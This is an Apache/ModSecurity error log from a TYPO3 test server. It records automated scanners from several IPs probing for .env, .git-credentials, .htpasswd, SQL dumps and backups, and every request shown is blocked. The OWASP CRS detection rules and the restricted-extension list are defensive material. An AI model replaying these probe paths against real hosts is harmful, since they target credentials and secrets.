[Sat Aug 09 11:47:18.601775 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aJcZJqOhwtXACoBdcZpUdAAAAAg"]
[Sat Aug 09 11:47:18.601963 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aJcZJqOhwtXACoBdcZpUdAAAAAg"]
[Sat Aug 09 11:47:18.700487 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sat Aug 09 11:47:18.720963 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sat Aug 09 11:47:18.741310 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Aug 09 11:47:18.761738 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Aug 09 11:47:18.782578 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/debug.log
[Sat Aug 09 11:47:18.803334 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/error.log
[Sat Aug 09 11:47:18.907332 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Aug 09 11:47:18.927738 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Aug 09 11:47:18.948173 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Aug 09 11:47:19.011786 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Sat Aug 09 11:47:19.032539 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Sat Aug 09 11:47:19.660022 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.sql
[Sat Aug 09 11:47:19.680375 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Sat Aug 09 11:47:19.700767 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Sat Aug 09 11:47:19.721157 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Sat Aug 09 11:47:19.741502 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup_*.sql
[Sat Aug 09 11:47:19.761998 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database
[Sat Aug 09 11:47:19.898029 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUkQAAAAg"]
[Sat Aug 09 11:47:19.898398 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUkQAAAAg"]
[Sat Aug 09 11:47:19.898572 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUkQAAAAg"]
[Sat Aug 09 11:47:19.956948 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/*.bak
[Sat Aug 09 11:47:19.977901 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/*.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUlAAAAAg"]
[Sat Aug 09 11:47:19.978403 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/*.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUlAAAAAg"]
[Sat Aug 09 11:47:19.978591 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/*.backup"] [unique_id "aJcZJ6OhwtXACoBdcZpUlAAAAAg"]
[Sat Aug 09 11:47:19.999008 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/*.old"] [unique_id "aJcZJ6OhwtXACoBdcZpUlQAAAAg"]
[Sat Aug 09 11:47:19.999369 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/*.old"] [unique_id "aJcZJ6OhwtXACoBdcZpUlQAAAAg"]
[Sat Aug 09 11:47:19.999573 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/*.old"] [unique_id "aJcZJ6OhwtXACoBdcZpUlQAAAAg"]
[Sat Aug 09 11:47:20.064702 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git-credentials
[Sat Aug 09 11:47:20.085545 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Aug 09 11:47:20.106038 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Sat Aug 09 11:47:20.126878 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sat Aug 09 11:47:20.147384 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Aug 09 11:47:20.167840 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Sat Aug 09 11:47:20.188319 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.lock
[Sat Aug 09 11:47:20.209117 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aJcZKKOhwtXACoBdcZpUngAAAAg"]
[Sat Aug 09 11:47:20.209372 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aJcZKKOhwtXACoBdcZpUngAAAAg"]
[Sat Aug 09 11:47:20.209558 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aJcZKKOhwtXACoBdcZpUngAAAAg"]
[Sat Aug 09 11:47:20.230245 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/package-lock.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package-lock.json found within REQUEST_FILENAME: /package-lock.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aJcZKKOhwtXACoBdcZpUnwAAAAg"]
[Sat Aug 09 11:47:20.230522 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aJcZKKOhwtXACoBdcZpUnwAAAAg"]
[Sat Aug 09 11:47:20.230712 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package-lock.json"] [unique_id "aJcZKKOhwtXACoBdcZpUnwAAAAg"]
[Sat Aug 09 11:47:20.251685 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aJcZKKOhwtXACoBdcZpUoAAAAAg"]
[Sat Aug 09 11:47:20.251918 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aJcZKKOhwtXACoBdcZpUoAAAAAg"]
[Sat Aug 09 11:47:20.252096 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aJcZKKOhwtXACoBdcZpUoAAAAAg"]
[Sat Aug 09 11:47:21.112133 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Warning. Matched phrase ".idea" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .idea found within REQUEST_FILENAME: /.idea/workspace.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/workspace.xml"] [unique_id "aJcZKW2x4WIHKp3n7cxs6AAAAAw"]
[Sat Aug 09 11:47:21.112388 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/workspace.xml"] [unique_id "aJcZKW2x4WIHKp3n7cxs6AAAAAw"]
[Sat Aug 09 11:47:21.112588 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/workspace.xml"] [unique_id "aJcZKW2x4WIHKp3n7cxs6AAAAAw"]
[Sat Aug 09 11:47:21.325872 2025] [authz_core:error] [pid 1817247] [client 185.177.72.201:64116] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htpasswd
[Sat Aug 09 11:47:21.432042 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJcZKW2x4WIHKp3n7cxs8AAAAAw"]
[Sat Aug 09 11:47:21.432312 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJcZKW2x4WIHKp3n7cxs8AAAAAw"]
[Sat Aug 09 11:47:21.432511 2025] [:error] [pid 1817247] [client 185.177.72.201:64116] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJcZKW2x4WIHKp3n7cxs8AAAAAw"]
[Sat Aug 09 11:47:21.494433 2025] [authz_core:error] [pid 1817247] [client 185.177.72.201:64116] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sat Aug 09 11:47:21.517025 2025] [authz_core:error] [pid 1817247] [client 185.177.72.201:64116] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sun Aug 10 00:06:13.429909 2025] [:error] [pid 1836763] [client 196.251.81.14:55642] [client 196.251.81.14] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJfGVepMCFIaLJsBbZwfMwAAAAU"]
[Sun Aug 10 00:06:13.430227 2025] [:error] [pid 1836763] [client 196.251.81.14:55642] [client 196.251.81.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJfGVepMCFIaLJsBbZwfMwAAAAU"]
[Sun Aug 10 00:06:13.430443 2025] [:error] [pid 1836763] [client 196.251.81.14:55642] [client 196.251.81.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJfGVepMCFIaLJsBbZwfMwAAAAU"]
[Sun Aug 10 06:42:29.304412 2025] [:error] [pid 1839699] [client 213.209.143.116:58226] [client 213.209.143.116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJgjNUoU5M9-Zsb4DtSgUQAAAAU"]
[Sun Aug 10 06:42:29.304640 2025] [:error] [pid 1839699] [client 213.209.143.116:58226] [client 213.209.143.116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJgjNUoU5M9-Zsb4DtSgUQAAAAU"]
[Sun Aug 10 06:42:29.304809 2025] [:error] [pid 1839699] [client 213.209.143.116:58226] [client 213.209.143.116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJgjNUoU5M9-Zsb4DtSgUQAAAAU"]
[Sun Aug 10 13:31:18.717048 2025] [authz_core:error] [pid 1839993] [client 198.55.98.253:39928] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Aug 10 16:31:36.328578 2025] [authz_core:error] [pid 1839638] [client 3.142.45.220:39132] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
